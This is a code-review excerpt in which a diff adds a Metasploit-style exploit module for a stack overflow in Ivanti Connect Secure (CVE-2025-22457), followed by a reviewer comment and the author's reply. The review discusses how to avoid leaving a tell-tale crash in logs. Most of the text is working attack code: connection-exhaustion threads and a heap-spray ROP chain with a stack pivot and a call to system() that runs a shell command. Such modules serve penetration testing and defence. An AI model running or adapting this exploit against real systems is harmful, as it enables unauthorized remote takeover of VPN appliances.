modules/exploits/linux/http/ivanti_connect_secure_stack_overflow_rce_cve_2025_22457.rb

```diff
@@ -0,0 +1,374 @@
+  end
+
+  def make_connections
+    print_status('Making connections...')
+
+    @lock = Mutex.new
+    threads = []
+
+    0.upto(datastore['MAX_THREADS']) do
+      threads << Rex::ThreadFactory.spawn('IvantiConnectSecureRCE', false) do
+        loop do
+          break unless @lock.synchronize do
+            @spray_socks.size < ((1024 - 256) * datastore['WEB_CHILDREN'])
+          end
+
+          body = "GET / HTTP/1.1\r\n"
+          body << "Host: #{rhost}:#{rport}\r\n"
+          body << "User-Agent: AnyConnect-compatible OpenConnect VPN Agent v9.12-188-gaebfabb3-dirty\r\n"
+          body << "Content-Type: EAP\r\n"
+          body << "Upgrade: IF-T/TLS 1.0\r\n"
+          body << "Content-Length: 0\r\n"
+          body << "\r\n"
+
+          s = send_http_data(body)
+          res = s.read
+
+          fail_with(Failure::Unreachable, 'No response received from the target.') unless res.present?
+          fail_with(Failure::UnexpectedReply, 'Bad response from the target') unless res.include?('101 Switching Protocols')
+
+          @lock.synchronize do
+            @spray_socks << s
+          end
+        rescue IvantiNetworkError => e
+          fail_with(Failure::Unreachable, "Unable to make a connection. You might need to increase the file descriptor limit with `ulimit` (e.g. `ulimit -n 65535`): #{e}")
+        end
+      end
+    end
+
+    threads.each(&:join)
+  end
+
+  def spray(libdsplibs_base)
+    print_status('Spraying...')
+
+    padding = 'D' * 128
+
+    spray_pattern = [
+      # DWORD   , # Address where it will be found after the heap spray
+      0xCAFEF00D, # 0x39393818:
+      0xCAFEF01D, # 0x3939381C:
+      0xCAFEF02D, # 0x39393820:
+      0xCAFEF03D, # 0x39393824:
+
+      libdsplibs_base + @target[:gadget_mov_esp_ebp_pop_ret], # 0x39393828: <--- initial eip control, stack pivot gadget.
+      0x39393828 - 0x10, # 0x3939382C:
+      0xCAFEF06D, # 0x39393830: <--- points here @ ebp (rop: pop ebp)
+      libdsplibs_base + @target[:gadget_pop_ebx_ret], # 0x39393834:
+
+      libdsplibs_base + @target[:offset_to_got_plt], # 0x39393838: <--- eax (rop pop ebx)
+      libdsplibs_base + @target[:gadget_call_system], # 0x3939383C:
+      0xCAFEF0AD, # 0x39393840:
+      0xCAFEF0BD, # 0x39393844:
+
+      0xCAFEF0CD, # 0x39393848:
+      0xCAFEF0DD, # 0x3939384C:
+      0xCAFEF0ED, # 0x39393850:
+      0xCAFEF0FD, # 0x39393854:
+
+      0xCAFEF10D, # 0x39393858:
+      0x3939382C, # 0x3939385C: <--- 0x39393830+0x2c ->> edx 0x3939382C
+      0xCAFEF12D, # 0x39393860:
+      0xCAFEF13D, # 0x39393864:
+
+      0x39393918, # 0x39393868: <--- ptr to shell_cmd, referenced @ edi
+      0xCAFEF15D, # 0x3939386C:
+      0xCAFEF16D, # 0x39393870:
+      0xCAFEF17D, # 0x39393874:
+
+      0xCAFEF18D, # 0x39393878:
+      0xCAFEF19D, # 0x3939387C:
+      0xCAFEF1AD, # 0x39393880:
+      0xCAFEF1BD, # 0x39393884:
+
+      0xCAFEF1CD, # 0x39393888:
+      0x41414141, # 0x3939388C: <--- last EIP after payload exits.
```

Comment:
Could it be possible to call `exit` or something equivalent to gracefully terminate the process instead of leaving a suspicious `SIGSEGV at 0x41414141` in the logs? :P

Reply:
I looked into this and this comment is actually wrong. The process crashes after `system()` is executed, when the calling function returns (`DSSys::isInterfaceEnabled()`). The stack is overwritten during the execution of `DSSys::isInterfaceEnabled()`, before `system()` is called, which makes the return address invalid. I couldn't find a way around this. So I will simply remove the `0x41414141` value here.